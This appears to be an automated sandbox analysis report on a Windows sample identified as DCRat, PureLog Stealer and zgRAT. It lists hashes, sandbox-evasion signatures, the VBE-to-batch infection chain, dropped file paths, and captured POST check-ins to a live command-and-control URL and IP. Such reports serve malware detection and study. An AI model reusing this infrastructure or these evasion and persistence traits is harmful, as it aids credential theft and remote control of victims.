Windows Analysis Report
CJF0Ri1HrG.exe

Overview

General Information

Sample name: CJF0Ri1HrG.exe (renamed because original name is a hash value)
Original sample name: 622AF327A5C66CA6D6D41BF02384B590.exe
Analysis ID: 1403873
MD5: 622af327a5c66ca6d6d41bf02384b590
SHA1: 2e09d3d9017aec9781b77144323eacb06e7838c4
SHA256: 1b41fe8ede3b534d1ce19e0d2976fa735e7e2187d17dcbea6c337ed176ad038a
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CJF0Ri1HrG.exe (PID: 6804 cmdline: C:\Users\user\Desktop\CJF0Ri1HrG.exe MD5: 622AF327A5C66CA6D6D41BF02384B590)
    • wscript.exe (PID: 6964 cmdline: "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6800 cmdline: C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hyperbrokerhostNetsvc.exe (PID: 6780 cmdline: C:\PortCommon/hyperbrokerhostNetsvc.exe MD5: 23710DF1E01CFC3FA04052BA9F873D98)
          • cmd.exe (PID: 2180 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3652 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 6460 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\PortCommon\hyperbrokerhostNetsvc.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\PortCommon\hyperbrokerhostNetsvc.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
0000000D.00000002.2858831534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000000.1877081316.0000000000632000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000000D.00000002.2858831534.0000000002D55000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.1616007019.0000000006DF2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
5.0.hyperbrokerhostNetsvc.exe.630000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
5.0.hyperbrokerhostNetsvc.exe.630000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user\Desktop\CJF0Ri1HrG.exe, ParentImage: C:\Users\user\Desktop\CJF0Ri1HrG.exe, ParentProcessId: 6804, ParentProcessName: CJF0Ri1HrG.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" , ProcessId: 6964, ProcessName: wscript.exe

Timestamp: 03/06/24-09:52:31.999098
SID: 2048095
Source Port: 49735
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: http://h172956.srv11.test-hf.su | Avira URL Cloud: Label: malware
Source: http://h172956.srv11.test-hf.su/ | Avira URL Cloud: Label: malware
Source: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php | Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\AFgebewE.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\nxxgerdx.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\kekpPWli.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\Public\TextInputHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\OnibhGNt.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\avRZftgA.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\XWBrRjTb.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat | Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\PgdUomGa.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\TOksRAfO.log | Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\Desktop\KxrkaJNA.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\GHBtTNNH.log | Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: h172956.srv11.test-hf.su | Virustotal: Detection: 13%
Source: http://h172956.srv11.test-hf.su | Virustotal: Detection: 13%
Source: http://h172956.srv11.test-hf.su/ | Virustotal: Detection: 13%
Source: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php | Virustotal: Detection: 15%
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | ReversingLabs: Detection: 91%
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Virustotal: Detection: 75%
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | ReversingLabs: Detection: 91%
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Virustotal: Detection: 75%
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | ReversingLabs: Detection: 91%
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Virustotal: Detection: 75%
Source: C:\Users\Public\TextInputHost.exe | ReversingLabs: Detection: 91%
Source: C:\Users\Public\TextInputHost.exe | Virustotal: Detection: 75%
Source: C:\Users\user\Desktop\AFgebewE.log | Virustotal: Detection: 8%
Source: C:\Users\user\Desktop\EMydcNjR.log | Virustotal: Detection: 23%
Source: C:\Users\user\Desktop\GHBtTNNH.log | Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\OnibhGNt.log | Virustotal: Detection: 19%
Source: C:\Users\user\Desktop\QpUJDpSo.log | Virustotal: Detection: 8%
Source: C:\Users\user\Desktop\RUhcZACY.log | Virustotal: Detection: 23%
Source: C:\Users\user\Desktop\TOksRAfO.log | Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\XWBrRjTb.log | ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\XWBrRjTb.log | Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\avRZftgA.log | Virustotal: Detection: 19%
Source: CJF0Ri1HrG.exe | ReversingLabs: Detection: 57%
Source: CJF0Ri1HrG.exe | Virustotal: Detection: 49%
Source: C:\Users\user\Desktop\AFgebewE.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\nxxgerdx.log | Joe Sandbox ML: detected
Source: C:\Users\Public\TextInputHost.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Joe Sandbox ML: detected
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\jHHpWudE.log | Joe Sandbox ML: detected
Source: CJF0Ri1HrG.exe | Joe Sandbox ML: detected
Source: CJF0Ri1HrG.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: CJF0Ri1HrG.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CJF0Ri1HrG.exe
Source: Binary string: 7..pDb source: hyperbrokerhostNetsvc.exe, 00000005.00000002.1940161275.00007FFD9C150000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: <".pDB source: CJF0Ri1HrG.exe
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Code function: 0_2_0036A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0036A69B
Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe | Code function: 0_2_0037C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0037C220
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File opened: C:\Users\user
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File opened: C:\Users\user\AppData
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | File opened: C:\Users\user\AppData\Local
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 5_2_00007FFD9BC4A75D
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 4x nop then jmp 00007FFD9BAB16D6h 13_2_00007FFD9BAB14CE
Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 13_2_00007FFD9BC4A75D

Networking

Source: Traffic | Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49735 -> 91.227.16.11:80
Source: Joe Sandbox View | IP Address: 91.227.16.11
Source: Joe Sandbox View | ASN Name: EXIMIUS-ASRU
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 384 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 2548 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 1868 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 2548 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 1868 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----1gHbR9SeE9VTaBijzqbnE2fczWhF4BVimU | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 153534 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 1872 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 1872 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 2544 | Expect: 100-continue | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 1872 | Expect: 100-continue | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 2544 | Expect: 100-continue
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | DNS traffic detected: queries for: h172956.srv11.test-hf.su
                          Source: unknown | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: h172956.srv11.test-hf.su | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://h172956.srv11.test-hf.su
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://h172956.srv11.test-hf.su/
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php
                          Source: hyperbrokerhostNetsvc.exe, 00000005.00000002.1918995355.000000000350E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 